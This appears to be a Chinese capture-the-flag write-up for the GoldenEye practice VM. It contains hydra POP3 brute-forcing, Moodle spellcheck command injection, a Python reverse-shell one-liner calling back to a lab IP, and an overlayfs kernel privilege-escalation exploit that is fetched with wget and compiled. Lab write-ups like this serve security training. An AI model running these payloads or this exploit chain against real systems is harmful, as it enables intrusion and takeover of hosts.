【靶机渗透】GoldenEye靶机渗透练习

1.主机发现：arp-scan -l，发现靶机ip为192.168.225.153

2.扫描端口，开启了55007端口为pop3服务

nmap 192.168.225.153 -sV -sC -Pn -n -v -T5 -p-

 

3.访问网址，查看源代码，发现terminal.js，进行访问发现两个用户名：boris和Natalya

进行unicode解码，获得密码：InvincibleHack3r

4.尝试登录：http://192.168.225.153/sev-home/

5.获得页面提示：在非默认端口，开了pop3服务

在上面，nmap已经扫过了，55007开的pop3端口

6.源码暗示我们登录到这两个用户的邮箱中去，所以首先爆破密码：

hydra -L user.txt -P /usr/share/wordlists/fasttrack.txt 192.168.225.153 -s 55007 pop3

 

7.nc登录，查看邮箱信息，发现boris里面没有有用信息，所以登录：

nc 192.168.225.153 55007
user Natalya
pass bird
list
retr 2

8.在第二封邮件看到了另外一个用户名密码，此服务器域名和网站，还要求我们在本地hosts中添加域名信息：

邮件信息：
username:xenia
password:RCP90rulez!
域：severnaya-station.com
网址：severnaya-station.com/gnocertdir/

9.添加域名信息：

vi /etc/hosts

 

10.添加之后，访问网址：severnaya-station.com/gnocertdir

11.在右上角发现要登录，试着用刚刚在邮件中发现的账号和密码进行登录，登进去后，在"My profile"-->"Messages"-->选择"Recent conversations"看到一个名为doak的用户

12.用hydra爆破这个用户的密码：

hydra -l doak -P /usr/share/wordlists/fasttrack.txt 192.168.225.153 -s 55007 pop3

13.同样的方法nc登录改用户邮箱，又发现新的账户密码：

username:dr_doak

password:4England!

用该账号登录：

http://severnaya-station.com/gnocertdir/login/index.php

在"My profile"->"My private files"里面发现了s3cret.txt

14.根据文档提示下载图片：

http://severnaya-station.com/dir007key/for-007.jpg

 

strings for-007.jpg

杂项思路，发现编码BASE64解密：

eFdpbnRlcjE5OTV4IQ==  //xWinter1995x!

15.在未读消息中，发现管理员用户，猜测以上为管理员密码，进行登录：

Site administration->Plugins->Text editors->TinyMCE中Spell engine选项修改为PSpellShell

16.添加反弹Shell代码：

在"Settings"-->"Site administration"-->"Server"-->"System paths"-->"Path to aspell"进行命令执行

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.225.133",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

17.kali上监听端口，通过在home->my profile->blogs->add a new entry中新建文章，随便输入字符，点击"Toggle Spellchecker"之后就会反弹到shell

提权：

18.生成交互式shell：

python -c 'import pty; pty.spawn("/bin/bash")'

 

12.uname -a查看靶机版本，使用msfconsole查询漏洞并使用

searchsploit ubuntu 3.13

13.由于靶机没有安装gcc，这里使用cc编译，需要修改源码一处代码，将gcc改为cc。

 

开启http.server服务，将37292.c传至靶机并执行，会生成a.out，对他修改执行权限并执行

python3 -m http.server 80
wget 192.168.225.133/37292.c /tmp
cc 37292.c
chmod 777 a.out
ls -al

 

14.总结

1.js信息泄露

2.hydra爆破pop3服务

3.登陆pop3服务（nc，list，retr）

4.moodle平台

5.拼写检查getshell

6.Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04)-'overlayfs' Local Privilege Escalation提权

 扩展：

该网站的cms是Moodle的2.2.3版本，该版本存在远程命令执行的漏洞：

Moodle允许经过身份验证的用户通过web界面定义拼写检查设置。用户可以更新拼写检查机制以指向安装了二进制文件的系统。通过将拼写检查器的路径更新为任意命令，攻击者可以运行拼写检查请求时web应用程序上下文中的任意命令。

此模块还允许攻击者利用另一个权限提升漏洞。使用引用的XSS vuln，一个未经授权的身份验证用户可以窃取一个管理员sesskey并使用它将权限升级为管理员权限，从而允许模块弹出一个shell作为以前未经授权的身份验证用户。